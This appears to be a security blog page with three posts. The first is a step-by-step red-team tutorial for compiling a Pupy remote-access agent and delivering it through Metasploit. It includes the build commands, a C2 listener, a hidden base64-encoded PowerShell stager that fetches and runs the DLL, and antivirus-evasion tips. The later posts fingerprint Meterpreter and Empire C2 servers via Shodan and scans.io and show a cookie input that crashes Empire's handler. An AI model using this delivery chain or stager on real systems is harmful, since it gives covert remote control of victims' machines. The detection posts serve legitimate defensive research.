Showing posts with label c2. Show all posts

Wednesday, November 8, 2017

Pupy as a Metasploit Payload

Introduction

Pupy, written by N1nj4sec, is an open source, cross-platform, modular Remote Administration Tool (RAT) / post exploitation toolkit written in Python. It bundles all dependencies into a single PE or reflective DLL for execution on Windows environments. By utilizing the DLL feature, we can easily plug it into Metasploit as an exploit payload (assuming it supports dllinject as a payload). This allows us to easily shift our agents as Red Teams in order to avoid detection due to reused Indicators of Compromise (IoC)s.

Installing Pupy

We'll go ahead and grab virtualenv, if it isn't already installed. From there we'll initialize all of the submodules, and get ready to recompile the payloads. There are precompiled payloads available, but these are more likely to set off Antivirus. It's generally best practice to compile everything yourself anyways, unless you're going for anti-attribution. Yes, Blue Teams like to write people off as script kiddies too.

Note: Don't underestimate your enemy based on initial analysis.

sudo apt-get install virtualenv libssl-dev python-dev git
git clone https://github.com/n1nj4sec/pupy.git pupy
cd pupy
virtualenv ./
. ./bin/activate
git submodule init
git submodule update
pip install -r pupy/requirements.txt

If you have issues with installing M2Crypto from pip, I'd recommend installing it on your distro and use that copy. Also, remove m2crypto line from pupy/requirements.txt

sudo apt-get install python-m2crypto
ln -s /usr/lib/python2.7/dist-packages/M2Crypto lib/python2.7/site-packages/M2Crypto

Build binaries

As previously discussed, we will compile our own payload template binaries. If this is your first time running the buildenv.sh script, it will take a few minutes to grab all of the mingw packages required for cross-compiling the templates. Many of the shellcode stubs are taken directly from metasploit/meterpreter projects, and will cause AV to flag a lot of the template files. I highly recommend spending 30 minutes or so to tweak the techniques, as it will go a long way towards AV evasion. Unfortunately, there is no master config for network signatures, but all transport modules are written in Python which can be found in pupy/network/transports and are generally easy to modify.

The following commands will populate the templates located in pupy/payload_templates.

# If you don't currently have multiarch, install it now.
sudo dpkg --add-architecture i386 && sudo apt-get update
cd client/sources
./buildenv.sh
./build.sh

Generate Agent DLL

Metasploit currently requires us to generate x86 binaries, so we'll stick with that for generating our pupy dll. This will allow us to use any of Metasploit's dll stubs, or use it directly for throwing exploits. For the sake of demonstration, we will stick to executing a powershell one liner to retrieve and execute the DLL using metasploit's framework.

Generate the pupy agent using the following line. Replace the IP address with your C2 node IP or hostname.

cd ../../pupy
./pupygen.py -O windows -A x86 -f client -S --randomize-hash auto_proxy --transport http --host 192.168.1.138:8080

Start Pupy Listener

We still need to get the metasploit stub ready, but go ahead and start a pupysh session using the same transport and port from above.

./pupysh.py -t http --port 8080

Generate Agent Stub

Start up msfconsole, and generate the stub by using the following commands.

use payload/windows/dllinject/reverse_http
set DLL ~/pupy/pupy/pupyx86.AUbLKU.dll
set LHOST 192.168.1.138
set LPORT 9090
generate -t psh-cmd

If all went well, you should have something similar to the following.

powershell.exe -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAGkAcgArACcAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQA7ACQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAUwB0AGEAcgB0AEkAbgBmAG8AOwAkAHMALgBGAGkAbABlAE4AYQBtAGUAPQAkAGIAOwAkAHMALgBBAHIAZwB1AG0AZQBuAHQAcwA9ACcALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACAAJgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AUwB0AHIAZQBhAG0AUgBlAGEAZABlAHIAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARwB6AGkAcABTAHQAcgBlAGEAbQAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcAJwBIADQAcwBJAEEARwA2AGcAQQAxAG8AQwBBADcAVgBXAGUAMgAvAGEAUwBCAEQALwBPADUASAA2AEgAYQB3AEsAeQBiAGIATwB3AFoARABRADkAQgBJAHAAMAB0AG0AOABiAEkAbwBKAHgARwBCAEMASwBEAG8AdAA5AHQAbwBzAHIAQgArADEAMQA0AEQAcAA5AGIAdgBmAEcATwB3ADIAVgBkAEsANwA5AHEAUwB6AHMATAB3ADcAcgA1ADMANQB6AFcATgB4ADAAOABCAG0ASgBBAHcANABqAE8ANAAxADcAdgBPAGIAOAA3AE0AaABpAHAASABQAEMAWgBWADkAaABDAFcAdQBrAHIAWABXADQAdABrAFoAawBDAHQARQA1AGUANAA0AFkAYQA1AEUAVQBTAHYAMABFAFEAawBXAHQANwBmAE4ATgBJADUAeAB3AEUANwA3AGEAaABjAHoASgBVAG0AdwB2ADYAUQBFAEoANABMAEkALwBjAFYATgBWAHoAagBHAEYALwBmAEwATgBiAFkAWgA5ADUAbQByAC8ARgBuAHQAMABuAEMASgBhAEMARwBXAE4AWgBHADkAdwB0AHkARgBFAGoAZwA1AHIAeAAvAGEASwBIAGUAbABhAGsAYQBVAE0ASQBIAC8AKwBKAEUAWAA1AHgAZgAxAFIAYgBYADkASwBVAFUAMABFAFgAZwB6AFMAeABqADIAcQB3ADYAbAB2AE0AaAA5AEUAZgBNAEQAeAAxAG0ARQBCAGQANABnAGQAaAB3AG0AbwBjAHUAcQBVAHgASgBjAFgAVgBZAG4AUQBZAEoAYwBQAEEAQgByAFcAMgB4AGcAdABnAHEAZABoAEIAYwBoAEIAdgBqAEYAbQBLAFYAeAB3AEUARQAwAHUAZgBxAEoASwBmAEMAdwBIAE0AYQBoAHIAVABoAE8AagBCAE8AUQByAGUAcgBCAE4AdAB4AGcAbwBSAEsAawBsAEUAcgBjAEgAOABLADgATwBQAHMAaABEAFIAagB4AE0AZgBBAFoAagBzAFAASQB4AFAARwBXADIARABpAHAAYQBpAGgAdwBLAEgANwBBADcAawBJAFkANABGADAAWgA4AHMAOABxAEMAYwArAFYAUQBHAHIASQBZAGwARwBDAEYATAB4AHcAMABnAGkAZABsAE8ASwBUAEgAaQArACsAZABEAE4AUABtAGcAaABQAGsAVABpAEkAKwBjAHUAYgA4AHoAZgBuAGIAcABsAGsATAA3AE8AcwA1ADAAbQBHADEAZABuADgAdQBNAGIAZwBtAGoAQQBNAEUAMwBLAFUAdQArAE4AcQBFAG0AZgBBAE0AWQBpAEYAYwBRAGIAYgB5AGoAaABPAHMAYgBqAGcANQBqAG4AZwA4ADgAVwBDAHEANgBSAFoATgBwAEIAKwByAEYAOAB2AGgAVQBIAFUAWgAwAEMAWQBXAHkARgB4AEYAcQBCAFEASgBLAEoAQwByAG4AUABxAGoAOAB1AHAAaABWADAAUwA0AEYAWQBXAEkASgAvAFkAWgBjAFUASQByADgARwBMAFgAWQBxAFAAOABWAFYATABzAFEARQA0AEoAUABBAEYAQQB6AHMAdABUAEwARwBIAFcAQQA2AFoAeABNADEAZgBxAHIAVgA5AHcAcgA3AHEAcQBpAG0AaABEAG8ANABWAEcAMQBLAFUAZwBGAGUAUQBQAGYARgA3AFoAMAA1AFoARQBIAGcAOQBNAEwAQQBQACsASgB6ADIAUABJAEQAdQBRAHAAMwBpAFUAcgBxAG8AegBhAHcAOABQAGQAKwBEAEUATgArAGsASwBFAGsAawBiAHAAaABDAG8AOQBnAFMAWgAyAEoARQBzAFMATgB4AFMAcABDAFEAZwBxAFcAawBMAEQAdwB1ACsAVwAvAHUARwBpAGwAbAB4AEUAWQBKAEsAOAAwAHQAeABCAE8ASwB4AFcAbgBOAE0ARQBoAFkAbgBOAHEAUQBNAEkAaAA4AGIARQBiAFkASgBvAGoAbQBRAEUAaQBjAFIAaAB5AHMAWgBpAGIAeAB5AGwAUAA1AFYAMgBGAG8ASQBrAHAASgA0AEkARwBsAEwAYQBRAEIASwBIAG4ANABKAHMAdgBMAEkAQQBZAEgAagB5AGsAWABxAHkAWgBtAHUAaAA5AFIANwBJAFAATQBzAFYAOAA3AEYASABuAFEAbgBVAFcAVgBIACsAcwBHAGUAZABqAGgAdgAvAGUAdgByAE8ASgBUAHkAZQBZADQAbABBAEEAOAA4AHcANgBTAGEAOQBLAFEAUwBaAHgARgBZAGcAWgBOAG4AMgBQAHEAcwAvADkAMgA5AFAATgBtAHYANgA0ADIAWQAxAHkAawBRAEMAaQA3AFkAcQA1AG0ATABLAC8AbAB5AGcAYgBsAGwAVgBqAGcAYwBZAHcAKwBaAGgAQgA1AEoAdwA1ADkARgBTAFgANAB1AG0ARwB5AEcASABBAFIAMwBzAHIAMwBwAEsAbgBBAE0AOQBNAEQAYQB0AGoAcQBoAHQAUwBWAEgAYQBuAHIAQgByAHcAVABjAHEAVwBIAHIAZgBmAE8AaAA5ADUAYQBrACsAUABXAGYAdQBVAHEAZQBxAEkAYgAyAHIAQQAxADAAcgBUAEcAdABtAGQAYQBEAFcAYQAyAGQAZgBaAGgAcQBEAE8AagAvAGIAaABlAG0ANAByADIATQBKAG0AeABKADEAMwBSAHgAcQBTADIAbQBUAFUATwBVAFkAOABjAHoATAA3AGkAegBQAGIAeQA5AFUARQA5ADcARwByAHEALwByAEQAMgBIAEgAZgBXAGMAbAAzAHYAdgBXAHMAKwAxAE4AOQAxAFMASAAvAGEASABLAG0AMQBTADkAUgB2AHQAZABQACsAVgBOADIAcAB0AFUAYgBTAEoAagB0AHQAUgBDAGEAagBUAGEALwBEAGwAagBPAEwAbwBvAGsAcgBlADQALwAxAEcAMABUADIALwBYAGgAdAAxAGMATwBsAGIAOQBXAFUANwB1AG8ASwBUAGQAOQBGAFYAbgBkAGwATwBOAGwATQBrADIAOABtACsAOAB2ADYAWQBEAHkAQgBGADcAVwBpAEsAVQBhAHUAWABMAGQAZwA3AFEASAB0AGsAbwB5ADAAbgBhAEoAYwA2ADYATQA4ADMASwAyADEAVgB2AHUAVABnADYAZABNAHUAcQB0AEgAOABpAFIAMwA1AFoAdABwAGIAMAA4AEgAbwBhAEwAMAB2AEYAVQBuAHQAKwBHAE0ATABYADgAZABXADIAYgBqAFAAZgBDAG0AeQBJAHYAYwB5AGQASAAyAFUAOQBnAGYAegBXAFoAWQBsAHEAMgBWAHIAZABZADcAUAB0AEgAYgBZAEIAZQAxAHgANwBzAEIAYgBzAG4AMQB5AFUAMgA5AE0AVgAzAHYARwBPAHAATgA1AFIAdgByADAANgBqAHIASwBXADAANABFAE0ARQA3AFUAdABRAHgANgBwAEQATgA1AEwAZABIAHUAZgA0AEUAdABoAHAAQgBZAEYAMQA2AGkAZwA2ADgAMwBHADQANwBRAHIAMwBHADkAbQBpADMAZABwAGcAbABtAG0ATABmAGQAMwBiAGEASQA1ADAAYQBBAC8AZABhAHUANQBKAGwAKwBmAGYAOQAvAFYAaABQAGoAZgBHAHMAMABWACsAMwA0AFcAcwAwAEYATwBYAHUANwBtADEAZQBHADEAQQBjAEYAWAB4ADQAbAB2AFUAZgBqAFcAZwBEAHgAYwBrAEsAVQBhAGcARwBtAEwANQBsADUAMwBYAEMAdQBGAE4ATQAxAEcARgBJAGMAZwAxAEIATwBGADYAZgBHAHgAdwBIAG0ATQBJAEYAQgBGAGQAVQBXAGMASQBLAHAAYQBHAGQAVAAvAFAAagA3AEkAVwBiADUARABUAGYARgA5AEMAQgBFADEAaABlAFgAYgA2ADYARQByAG0AdgBnAHUASwAzAE8AVgArAFMAYgBtACsAZgB3AEUAdABvAGkAdwAyAHEAOQBuAEgAZwBzAFoAVgBVADIAMQAvAFYAYQBqAEMAMABhAC8AdABHAEQAUwBMADgAKwBiAGkAYQBZAFoAUQBKAFkARQBqAEsAUgB6ADYAQQBjAHIASgBLAGoAMQBiAEYAdgBFADAAcQBTAC8AVAAvAEEAbABXADAANQBnAG8AKwB6AHIAOABCADkAWQAzADIARAA5AHkAZgBBAHEAOABtADUAYwBHACsASQBIADUAUAArAEMAVQBrAGYAegBuAHcASwBTAEkATQBKAEUAMgBZAEwAUgBTAGYANwByAFQAWAA0AHkAOQBxADQAdABtAEYAdgAwAFMAUQBjAGIAZAA0ADgAcgA5AGEAOQB5AG0ANwBHAE0AQwAvAGcATAA4AEIAbgBDAG4AbQBUAHQAQQBKAEEAQQBBAD0AJwAnACkAKQApACwAWwBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApACkAKQAnADsAJABzAC4AVQBzAGUAUwBoAGUAbABsAEUAeABlAGMAdQB0AGUAPQAkAGYAYQBsAHMAZQA7ACQAcwAuAFIAZQBkAGkAcgBlAGMAdABTAHQAYQBuAGQAYQByAGQATwB1AHQAcAB1AHQAPQAkAHQAcgB1AGUAOwAkAHMALgBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAPQAnAEgAaQBkAGQAZQBuACcAOwAkAHMALgBDAHIAZQBhAHQAZQBOAG8AVwBpAG4AZABvAHcAPQAkAHQAcgB1AGUAOwAkAHAAPQBbAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBTAHQAYQByAHQAKAAkAHMAKQA7AA==

Set up Payload Delivery in Metasploit

Now, we need to setup a multi handler for delivering the DLL payload to the target. After the dll is delivered and executed, check back in your pupy tab for a shell.

use exploit/multi/handler
set payload windows/dllinject/reverse_http
set LHOST 192.168.1.138
set LPORT 9090
exploit

Get Shells

Execute the powershell stub that we generated above on a Windows machine, and enjoy your pupy shell delivered by Metasploit.

Tuesday, April 11, 2017

Hunting Red Team Meterpreter C2 Infrastructure

Introduction

This is part 2 of hunting Red Team C2 Infrastructure. Part 1 covered finding Empire C2 end points. In this post, we will show how to do the same for Meterpreter. There were no immediate crashing bugs found in the Meterpreter HTTP/S handler, but there is still enough information to profile these end points.

Meterpreter

Meterpreter is an advanced C2 infrastructure often used as a payload with the popular Metasploit exploit framework. It's cross-platform and highly extensible. In this post, we will focus on finding the reverse HTTP/S handlers for Meterpreter.

Meterpreter Headers

Using the HTTP request of GET / HTTP/1.0, the following headers were returned.

HTTP/1.1 200 OK
Connection: close
Server: Apache
Content-Length: 44

The thing that stands out here (similar to Empire) is the general lack of headers that would normally be present in a request. Also, the fact that we used HTTP/1.0 as the protocol, but the reply is still for HTTP/1.1

Meterpreter default page

<html><body><h1>It works!</h1></body></html>

Hashes of defaul page

MD5: c7b4690c8c46625ef0f328cd7a24a0a3
SHA1: 12179caec26a089cabcbb75c4dbe0bdfe60951f7
SHA2: 8f3ff2e2482468f3b9315a433b383f0cc0f9eb525889a34d4703b7681330a3fb

Finding Meterpreter Listeners with Shodan

Shodan is a search engine for Security Researchers. They routinely scan common ports across the Internet, and make the data publicly available, and easily searchable. APIs are also provided for automating a lot of the tasks required.

Using the common headers, and default web page listed above, we are able to narrow down the list of possible Meterpreter C2 node candidates on the Internet with a simple query.

'Server: Apache' 'It works!' -'Content-Type' 'Length: 44'

You'll notice that the results returned all are HTTP/1.1 with matching profiles that we scoped out above.

Random URLs

Another characteristic that makes Meterpreter listeners easy to identify, is that all requests that aren't to the backend result in the same response. Random URLs will get the same response as grabbing the index. Legitimate servers will typically produce a 404 error.

GET /lkafjdklfjasdklfjalkdjflkajd HTTP/1.0

Changing default values

There's no excuse for leaving your C2 node exposed to the entire Internet. Use whitelisting of IP space in order to keep your tests in scope, and avoid having other people attack your nodes. In order to change the default server and page discussed above, these are all part of the advanced settings.

use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set LHOST 127.0.0.1
set LPORT 8000
show advanced
set MeterpreterServerName nginx
set HttpUnknownRequestResponse httml_here

Going beyond Shodan

In case there are any questions about the servers found being Meterpreter listeners, the following is a valid URI that will download Stage1 of the Meterpreter session from any given reverse HTTP/S listener.

GET /huO7Mf9GbAoRFBAVSfkxDwLTm3Wcz8n3kuXycv7k4vWV-_dXg3aY1iQy83Cejls15IeYlhUZ0QMT8S1zHKR33-Ga1rVIiV6QNFjXzTgr4lwNq_YR1tqyIbl9ddVzJ8UeYWJ0MJnThtVJ7d46IZnwHYok-XXZJrhqgUaaJMQtmCGCQWFA9tXMVtZtQEaR9Hse2Muw-P5TX4M7LKtm93LLFCT5i1NshdiwcWOnVJq HTTP/1.0

As we discussed in part 1, we can use Scans.io data in order to get a broader search of HTTPS servers. If you still have a copy of the data, you can run a zgrep search like the following to identify possible C2 nodes from this data.

zgrep 'PGh0bWw+PGJvZHk+PGgxPkl0IHdvcmtzITwvaDE+PC9ib2R5PjwvaHRtbD4=' 20170221-https.gz > /tmp/results.json

This may take several minutes to run, as the datasets are generally several gigabytes in size. The result will be a file containing JSON data for each host that returned the default Meterpreter HTML. You can parse this file and extract each IP address that should be tested.

Happy hunting.

Wednesday, April 5, 2017

Hunting Red Team Empire C2 Infrastructure

Introduction

While playing around with setting up my C2 nodes and redirectors for an engagement, I decided to start poking around at both Empire and Meterpreter's default setups. The end goal of this project was to be able to positively identify nodes on the Internet that are being used actively by attackers or Red Teams with little to no scope filtering. The results were interesting, and the first time investigating revealed over twenty easy to find C2 nodes running stock Empire or Meterpreter reverse http/s sessions.

History of Failure

Coding is difficult, even for hackers. Both Empire, and Metasploit projects have a history of Remote Code Execution vulnerabilities. Red Teams need to go to great lengths in order to keep people from compromising their crown jewels which includes active agents and client data.

Empire RCE
Metasploit RCE

Empire

Empire, now in beta for 2.0 includes both Powershell Empire as well as the python version Empyre. The Empire listener is based on BaseHTTPServer in Python and provides an extraction layer on top of it. Let's take a look at the HTTP headers that are present in default Empire configuration.

Empire Headers

Using the HTTP request of GET / HTTP/1.1, the following headers were returned.

HTTP/1.0 200 OK
Server: Microsoft-IIS/7.5
Date: Wed, 05 Apr 2017 18:26:10 GMT

The thing that stands out here is the general lack of headers that would normally be present in a request. Also, the fact that we used HTTP/1.1 as the protocol, but the reply is still for HTTP/1.0

Empire default page

<html><body><h1>It works!</h1><p>This is the default web page for this server.</p><p>The web server software is running but no content has been added, yet.</p></body></html>

Hashes of defaul page

MD5: 885ecd7910c988f1f15fcacca5e1734e
SHA1: b642227fbc703af1a67edb665241fc709ecd6f6e
SHA2: a58fb107072d9523114a1b1f17fbf5e7a8b96da7783f24d84f83df34abc48576

Finding Empire Listeners with Shodan

Using the common headers, and default web page listed above, we are able to narrow down the list of possible Empire C2 nodes on the Internet with a simple query.

'Microsoft-IIS/7.5' 'It works!' -'Content-Type' -'Set-Cookie'

You'll notice that the results returned all are HTTP/1.0 with matching profiles that we scoped out above.

Finding an exception in Empire

The HTTP module in Empire is located in lib/common/http.py. Go ahead and use your favorite text editor to open that up, and have a look around at the code.

In the class RequestHandler and method do_GET we have the following piece of code for handling parsing of cookie data.

if cookie:
            # search for a SESSIONID value in the cookie
            parts = cookie.split(";")
            for part in parts:
                if "SESSIONID" in part:
                    # extract the sessionID value
                    name, sessionID = part.split("=")

Interesting.
name, sessionID = part.split("=")
If there is more than one equal sign in the cookie field, it'll continue to split on equal signs. That line should be this.
name, sessionID = part.split("=", 1)
In order to limit the number of items to one.

Let's go ahead and try to exploit this from the client side with the following request.

curl http://target:port --Cookie 'SESSIONID=id=id'

Curl will return the following error, because Python threw an exception upon parsing the cookies.

curl: (52) Empty reply from server

Changing default values

While executing a Red Team engagement, it's always a good idea to change the default values of tools that you use, whether it be a scanner or C2 infrastructure. This will make it harder for Blue Team elements to detect portions of your activity. You should also either utilize Empire's whitelisting feature or setup a Firewall in order to keep your test within scope. There is no excuse for leaving your C2 node exposed to the entire Internet.

You should have noticed while browsing http.py that the default page served is also located in that file in the function named default_page.

In order to change the default server name, you must edit the configuration in the empire.db file located in data/. Open it up by using sqlite3 data/empire.db. You can view the current setting by typing SELECT server_version from config;
In order to update it, something like the following will do the job.

update config set server_version = 'nginx' where server_version = 'Microsoft-IIS/7.5';

Going beyond Shodan

Scans.io is another great resource for looking at Internet-wide scans including those for HTTPS sites. The scan sets are huge, but offer a very current view of HTTPs servers across the globe. Data is in JSON format, and the default page is saved in base64 format within each node.

zgrep 'PGh0bWw+PGJvZHk+PGgxPkl0IHdvcmtzITwvaDE+PHA+VGhpcyBpcyB0aGUgZGVmYXVsdCB3ZWIgcGFnZSBmb3IgdGhpcyBzZXJ2ZXIuPC9wPjxwPlRoZSB3ZWIgc2VydmVyIHNvZnR3YXJlIGlzIHJ1bm5pbmcgYnV0IG5vIGNvbnRlbnQgaGFzIGJlZW4gYWRkZWQsIHlldC48L3A+PC9ib2R5PjwvaHRtbD4=' 20170221-https.gz > /tmp/results.json

This may take several minutes to run, as the datasets are generally several gigabytes in size. The result will be a file containing JSON data for each host that returned the default Empire HTML. You can parse this file and extract each IP address that should be tested, and then feed them into the script below.

Automating detection with Python

Use the following to run this script.

python3 empire_identifier.py

Happy hunting, a future post will detail similar experiences with Meterpreter.